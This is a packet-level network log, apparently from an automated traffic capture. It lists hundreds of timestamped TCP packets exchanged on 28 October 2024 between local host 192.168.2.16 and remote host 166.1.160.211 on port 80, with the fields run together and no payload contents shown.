                                                                                                                                                              Oct 28, 2024 19:46:23.178036928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178070068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178080082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178122044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178154945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178167105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178189039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178222895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178246975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178272963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178311110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178343058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178344965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178376913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178390026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178411007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178443909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178457022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178478956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178513050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178529024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178546906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178582907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178594112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178702116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178735971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178746939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178770065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178803921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178811073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178837061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178870916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178881884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178904057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178937912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178950071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178972960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179007053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179022074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179042101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179075956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179105997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179111004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179145098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179161072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179197073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179229975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179239988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179264069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179300070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179320097 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179352045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179383993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179395914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179440022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179472923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179483891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179507971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179542065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179554939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179577112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179610968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179626942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179645061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179698944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179768085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179800987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179836035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179851055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179922104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179950953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179969072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.238140106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.270663023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276365995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276401997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276448965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276527882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276563883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276597977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276613951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276631117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276679039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276681900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276717901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276751041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276767015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276786089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276833057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276837111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276871920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276906967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276923895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276992083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277024984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277043104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277173042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277220011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277221918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277256012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277290106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277307987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277323008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277359009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277368069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277499914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277534008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277548075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277569056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277602911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277612925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277636051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277668953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277677059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277704954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277748108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277827024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277863026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277895927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277905941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277931929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277981043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278027058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278197050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278279066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278292894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278314114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278346062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278358936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278382063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278415918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278429985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278496027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278529882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278542995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278564930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278598070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278616905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278646946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278681040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278693914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278714895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278748035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278759956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278783083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.278825045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.278975964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279011965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279047012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279062033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279148102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279181004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279192924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279216051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279264927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279351950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279385090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279418945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279428959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279453993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279486895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279495955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279525042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279567003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279664040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279696941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279735088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279746056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279768944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.279812098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.279813051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280021906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280055046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280067921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280194998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280230045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280245066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280263901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280297041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280306101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280349016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280383110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280390978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280416965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280451059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280458927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280484915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280519962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280529976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280682087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280715942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280726910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280749083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280781984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280801058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280814886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280848980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280860901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.280884981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.280937910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281028032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281060934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281095028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281115055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281126976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281162024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281173944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281196117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281229973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281238079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281265974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281316042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281363964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281398058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281430960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281444073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281464100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281497955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281506062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281533003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281567097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281578064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281601906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281646013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281682014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281717062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.281765938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.281836033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282044888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282077074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282105923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282111883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282145023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282159090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282197952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282232046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282244921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282268047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282301903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282315016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282335997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282376051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282378912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282512903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282545090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282558918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282578945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282613993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282627106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282685995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282718897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282737970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282752991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282798052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282845974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282877922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282912970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282926083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282948017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.282994986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.282999039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283031940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283065081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283076048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283098936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283132076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283140898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283164978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283198118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283212900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283231974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283267975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283277035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283303022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283350945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283351898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283386946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283437014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283642054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283675909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283711910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283725977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283822060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283854008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283866882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283888102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283920050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283940077 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283953905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283987045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283998013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.284020901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.284070015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.488419056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.495480061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495544910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495582104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495604038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.495615005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495650053 CET8049726166.1.160.211192.168.2.16
